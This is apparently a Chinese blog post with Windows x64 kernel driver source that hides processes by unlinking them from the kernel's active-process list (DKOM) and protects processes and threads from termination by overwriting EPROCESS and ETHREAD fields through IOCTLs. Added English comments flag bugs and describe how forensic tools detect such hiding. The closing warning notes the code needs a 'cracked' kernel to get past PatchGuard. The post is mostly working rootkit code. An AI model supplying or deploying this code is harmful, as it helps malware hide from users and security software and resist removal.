实现隐藏进程和保护进程的手段依然是DKOM,不过是修改的位置不同而已。
至于怎么在64位操作系统上加载驱动,我已经说过了,请参考这里。
驱动使用WDK7的x64 Free Build Environment编译。
核心源码:
/* Hard-coded byte offsets of EPROCESS fields. They are valid for exactly
 * one kernel build (the post's own warning refers to Win7 x64) and are never
 * verified at run time, so on any other build the reads and writes that use
 * them land on unrelated memory inside the EPROCESS.
 * NOTE(review): PROCESS_FLAGS_OFFSET is not referenced by any code shown in
 * this excerpt. */
#define PROCESS_FLAGS_OFFSET 0x440
#define PROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x188
#define PROCESS_RUNDOWN_PROTECT_OFFSET 0x178
/**
 * Read a 64-bit value from kernel address p.
 *
 * @param p  Address to read. It is first checked with MmIsAddressValid.
 * @return   The 64-bit value stored at p, or 0 when MmIsAddressValid reports
 *           the address as invalid. 0 is an in-band sentinel: a caller cannot
 *           distinguish "invalid address" from a field that really holds 0.
 *
 * NOTE(review): MmIsAddressValid is a point-in-time check only; the mapping
 * can change between the check and the dereference on the next line.
 */
ULONG64 Get64bitValue(PVOID p)
{
if(MmIsAddressValid(p)==FALSE)
return 0;
return *(PULONG64)p;
}
/**
 * Write a 64-bit value v to kernel address p.
 *
 * @param p  Destination address; silently ignored (no write, no error) when
 *           MmIsAddressValid reports it as invalid.
 * @param v  Value to store.
 *
 * The write happens with IRQL raised to DISPATCH_LEVEL. That only prevents
 * preemption on the current processor; it is not a lock and does not
 * serialize against other processors touching the same location.
 * NOTE(review): presumably intended as a synchronization measure — confirm.
 * The callers in this file use it to patch EPROCESS/ETHREAD fields in place
 * (DKOM), which is exactly the kind of modification PatchGuard checks for.
 */
VOID Set64bitValue(PVOID p, ULONG64 v)
{
KIRQL OldIrql;
if(MmIsAddressValid(p)==FALSE)
return ;
OldIrql = KeRaiseIrqlToDpcLevel();
*(PULONG64)p=v;
KeLowerIrql(OldIrql);
}
/**
 * Unlink ListEntry from the doubly-linked list it belongs to and make its
 * Flink/Blink point back at itself.
 *
 * @param ListEntry  The LIST_ENTRY to detach. No validity check is done on
 *                   the pointer or on its neighbours before they are read.
 *
 * The unlink is only performed when the entry is not already self-linked
 * and both neighbours agree that they point back to it; otherwise nothing
 * is modified. IRQL is raised to DISPATCH_LEVEL around the pointer swaps,
 * which blocks preemption on this processor only and is not a lock.
 *
 * Defender note: applied to EPROCESS.ActiveProcessLinks (see HideProcess)
 * this is classic DKOM process hiding. The process keeps running; it is
 * merely absent from enumerations that walk this list, which is why
 * memory-forensics tools cross-check other kernel bookkeeping and scan for
 * EPROCESS objects directly instead of trusting the list.
 */
VOID RemoveListEntry(PLIST_ENTRY ListEntry)
{
KIRQL OldIrql;
OldIrql = KeRaiseIrqlToDpcLevel();
if (ListEntry->Flink != ListEntry &&
ListEntry->Blink != ListEntry &&
ListEntry->Blink->Flink == ListEntry &&
ListEntry->Flink->Blink == ListEntry)
{
ListEntry->Flink->Blink = ListEntry->Blink;
ListEntry->Blink->Flink = ListEntry->Flink;
ListEntry->Flink = ListEntry;
ListEntry->Blink = ListEntry;
}
KeLowerIrql(OldIrql);
}
/**
 * Remove Process from the kernel's active-process list by unlinking the
 * LIST_ENTRY located PROCESS_ACTIVE_PROCESS_LINKS_OFFSET bytes into the
 * EPROCESS.
 *
 * @param Process  EPROCESS to hide. Not checked for NULL; the hard-coded
 *                 offset is assumed to match the running kernel build.
 *
 * Defender note: this is DKOM hiding. Nothing about the process itself
 * changes, so detection relies on cross-view comparison (e.g. comparing
 * list walks against other process tables or pool scans) rather than on
 * the list this function edits.
 */
VOID HideProcess(PEPROCESS Process)
{
RemoveListEntry((PLIST_ENTRY)((ULONG64)Process + PROCESS_ACTIVE_PROCESS_LINKS_OFFSET));
}
/**
 * IOCTL dispatch for the driver's control codes (first version).
 *
 * @param uIoControlCode  Control code selecting the action.
 *
 * Apart from HideProcess/Get64bitValue/Set64bitValue, every name used here
 * (dwInputPid, pIoBuffer, status, eProcess, OldVal, RdpVal and the IOCTL_*
 * constants) is file-scope state declared outside this excerpt. Because of
 * that, the cases are order-dependent: IOCTL_UnprotectProcess reuses the
 * eProcess and OldVal left behind by an earlier IOCTL_ProtectProcess and
 * never checks that such a call happened or succeeded.
 *
 * Review notes:
 *  - pIoBuffer is read without any check of the input buffer length; the
 *    only safety net is the __try/__except, which swallows every exception
 *    silently and reports nothing to the caller.
 *  - PsLookupProcessByProcessId returns a referenced PEPROCESS; nothing in
 *    this function releases it with ObDereferenceObject, so each successful
 *    lookup leaks a reference.
 *  - There is no default case; unknown codes fall through the switch.
 */
VOID Test(ULONG uIoControlCode)
{
switch(uIoControlCode)
{
case IOCTL_HideProcess:
{
__try
{
// NOTE(review): no length validation on pIoBuffer before the copy.
memcpy(&dwInputPid,pIoBuffer,sizeof(dwInputPid));
status=PsLookupProcessByProcessId(dwInputPid,&eProcess);
if(NT_SUCCESS(status))
{
HideProcess(eProcess);
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
// Any fault (e.g. an invalid pIoBuffer) is discarded without a trace.
;
}
break;
}
case IOCTL_ProtectProcess:
{
__try
{
memcpy(&dwInputPid,pIoBuffer,sizeof(dwInputPid));
status=PsLookupProcessByProcessId(dwInputPid,&eProcess);
if(NT_SUCCESS(status))
{
// DKOM: save the current 64-bit value at the rundown-protect offset in
// OldVal, then overwrite it with RdpVal (defined outside this excerpt).
// OldVal is the only record of the original; it is a single global, so a
// second IOCTL_ProtectProcess overwrites it.
OldVal=Get64bitValue((PULONG64)((ULONG64)eProcess+PROCESS_RUNDOWN_PROTECT_OFFSET));
Set64bitValue((PULONG64)((ULONG64)eProcess+PROCESS_RUNDOWN_PROTECT_OFFSET),RdpVal);
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
;
}
break;
}
case IOCTL_UnprotectProcess:
{
__try
{
// Restores whatever IOCTL_ProtectProcess saved; eProcess and OldVal are
// stale or zero if that IOCTL never ran, and nothing here checks for that.
Set64bitValue((PULONG64)((ULONG64)eProcess+PROCESS_RUNDOWN_PROTECT_OFFSET),OldVal);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
;
}
break;
}
}
}
更新内容:
/* Updated set of hard-coded offsets: EPROCESS.ActiveProcessLinks, an
 * EPROCESS field the code below reads and writes as 64 bits
 * (PROCESS_FLAG2_OFFSET), and an ETHREAD field it accesses as 32 bits
 * (CROSS_THREAD_FLAGS_OFFSET). As before they are tied to one kernel build
 * and are never validated at run time. */
#define PROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x188
#define PROCESS_FLAG2_OFFSET 0x43C
#define CROSS_THREAD_FLAGS_OFFSET 0x448
/**
 * IOCTL dispatch for the driver's control codes (updated version).
 *
 * @param uIoControlCode  Control code selecting the action.
 *
 * All state is file-scope and declared outside this excerpt: dwInPid,
 * dwInTid, pIoBuffer, status, eProcess, eThread, the saved originals
 * dwPOV/dwTOV, the replacement values dwPNV/dwTNV, the IOCTL_* constants,
 * dprintf (presumably a debug-print wrapper — confirm) and the
 * Get32bitValue/Set32bitValue helpers.
 *
 * Cases are order-dependent: IOCTL_UnprotectProcess, IOCTL_PauseThrdProtect
 * and IOCTL_ResumeThrdProtect all reuse eProcess/eThread and dwPOV/dwTOV
 * captured by earlier IOCTLs and never check that those lookups succeeded.
 * IOCTL_PauseThrdProtect writes the same value as the thread half of
 * IOCTL_UnprotectProcess (dwTOV); IOCTL_ResumeThrdProtect re-applies dwTNV.
 *
 * Review notes:
 *  - pIoBuffer is copied from without a buffer-length check; the
 *    __try/__except blocks discard every exception silently.
 *  - PsLookupProcessByProcessId and PsLookupThreadByThreadId return
 *    referenced objects; nothing here calls ObDereferenceObject, so each
 *    successful lookup leaks a reference.
 *  - The ETHREAD address is cast to PULONG64 even though the helpers it is
 *    passed to are 32-bit accessors; the helpers' signatures are not shown,
 *    so this may just be a harmless mismatch — verify.
 *  - No default case for unknown control codes.
 */
VOID Test(ULONG uIoControlCode)
{
switch(uIoControlCode)
{
case IOCTL_ProtectProcess:
{
__try
{
// NOTE(review): no length validation on pIoBuffer before the copy.
memcpy(&dwInPid,pIoBuffer,sizeof(dwInPid));
dprintf("[x64Drv] dwInPid=%ld",dwInPid);
status=PsLookupProcessByProcessId(dwInPid,&eProcess);
if(NT_SUCCESS(status))
{
// DKOM: save the 64-bit value at PROCESS_FLAG2_OFFSET in dwPOV, then
// overwrite it with dwPNV. dwPOV is a single global, so a repeated call
// loses the original.
dwPOV=Get64bitValue((PULONG64)((ULONG64)eProcess+PROCESS_FLAG2_OFFSET));
Set64bitValue((PULONG64)((ULONG64)eProcess+PROCESS_FLAG2_OFFSET),dwPNV);
dprintf("[x64Drv] Protect Process finished");
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
// Faults are swallowed; the caller gets no indication of failure.
;
}
break;
}
case IOCTL_ProtectThread:
{
__try
{
memcpy(&dwInTid,pIoBuffer,sizeof(dwInTid));
dprintf("[x64Drv] dwInTid=%ld",dwInTid);
status=PsLookupThreadByThreadId(dwInTid,&eThread);
if(NT_SUCCESS(status))
{
// Same save-then-overwrite pattern on the ETHREAD field at
// CROSS_THREAD_FLAGS_OFFSET, using the 32-bit helpers.
dwTOV=Get32bitValue((PULONG64)((ULONG64)eThread+CROSS_THREAD_FLAGS_OFFSET));
Set32bitValue((PULONG64)((ULONG64)eThread+CROSS_THREAD_FLAGS_OFFSET),dwTNV);
dprintf("[x64Drv] Protect Thread finished");
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
;
}
break;
}
case IOCTL_UnprotectProcess:
{
__try
{
// Restores both saved values unconditionally, even if only one of the
// two protect IOCTLs (or neither) ran; eProcess/eThread may be stale.
Set64bitValue((PULONG64)((ULONG64)eProcess+PROCESS_FLAG2_OFFSET),dwPOV);
Set32bitValue((PULONG64)((ULONG64)eThread+CROSS_THREAD_FLAGS_OFFSET),dwTOV);
dprintf("[x64Drv] Unprotect Process and Thread finished");
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
;
}
break;
}
case IOCTL_PauseThrdProtect:
{
__try
{
// Writes the saved original back; identical to the thread half of
// IOCTL_UnprotectProcess.
Set32bitValue((PULONG64)((ULONG64)eThread+CROSS_THREAD_FLAGS_OFFSET),dwTOV);
dprintf("[x64Drv] Thread Protect Suspended!");
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
;
}
break;
}
case IOCTL_ResumeThrdProtect:
{
__try
{
// Re-applies dwTNV without re-reading the field first, so the value
// held in dwTOV is not refreshed.
Set32bitValue((PULONG64)((ULONG64)eThread+CROSS_THREAD_FLAGS_OFFSET),dwTNV);
dprintf("[x64Drv] Thread Protect Resumed!");
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
;
}
break;
}
}
}
警告:此代码在没有破解内核的WIN7 X64上使用,会触发PatchGuard引起蓝屏。
Warning: if you use this code on Win7 x64 without a "cracked kernel", it will trigger PatchGuard and cause a BSOD.